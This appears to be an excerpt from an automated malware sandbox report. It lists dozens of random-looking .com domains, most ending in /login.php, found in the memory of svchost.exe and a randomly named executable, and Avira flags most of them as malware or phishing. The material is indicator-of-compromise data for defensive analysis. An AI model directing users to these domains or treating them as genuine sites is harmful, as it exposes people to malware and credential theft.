http://lyxyvyn.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.google.comtor	svchost.exe, 00000002.00000003.2332778027.0000000008726000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.0000000008726000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2367567062.0000000008726000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://puzylyp.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3383219866.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267140420.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397700563.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434703123.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393071613.0000000003385000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E3C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E37000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E05000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://vojyjyc.com/login.php	svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://galyvuz.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ganyzub.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401901735.0000000008633000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433469264.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430808473.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548643584.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527269285.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2541435217.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302596386.000000000865D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://vowyrif.com/login.php	svchost.exe, 00000002.00000003.2347368990.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://qexynyq.com/login.php	svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://lygyxun.com/login.php	svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297525559.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://galydyw.com/	svchost.exe, 00000002.00000003.2681961070.000000000866F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://lyryman.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gadykos.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://qexyfuq.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://lyvysur.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://galydyw.com/login.php	svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670306640.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://qexyvoq.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308250175.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302834749.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qekyhil.com/login.php	svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://vofydac.com/login.php	svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192707198.00000000033C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lymyner.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302611741.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303296410.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qetyhyg.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://qeqykyv.com/H	svchost.exe, 00000002.00000003.2681961070.000000000866F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gahyvab.com/login.php	svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ganyhus.com/H	svchost.exe, 00000002.00000003.2440992752.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396181713.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393087013.000000000866C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lygytyd.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302834749.0000000008690000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pufytip.com/login.php	svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://qedyhyl.com/login.php	svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566181125.000000000573E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pujyteq.com/login.php	svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2554924248.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lysytoj.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gatykyh.com/login.php	svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pupycuv.com/login.php	svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
